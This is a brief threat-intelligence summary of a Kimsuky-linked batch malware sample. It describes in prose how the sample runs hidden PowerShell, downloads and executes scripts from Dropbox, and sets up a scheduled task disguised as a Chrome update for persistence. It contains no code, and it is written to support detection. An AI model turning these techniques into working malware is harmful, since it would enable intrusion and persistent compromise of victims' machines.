A Kimsuky-linked BAT sample named pay.bat uses a hidden PowerShell launch with execution-policy bypass to decode and run an embedded Base64 command. The decoded script writes chrome.ps1 under the user's AppData directory, downloads and executes additional PowerShell content from Dropbox-hosted URLs, then removes the temporary downloaded scripts. It registers a hidden scheduled task named ChromeUpdateTaskMachine that starts after five minutes and repeats every 30 minutes, providing persistence for recurring script execution. The excerpt lists hashes for the BAT file and notes multiple vendor detections, including BAT/Kimsuky.O and downloader-oriented classifications, which can support detection and hunting for Kimsuky script staging behavior.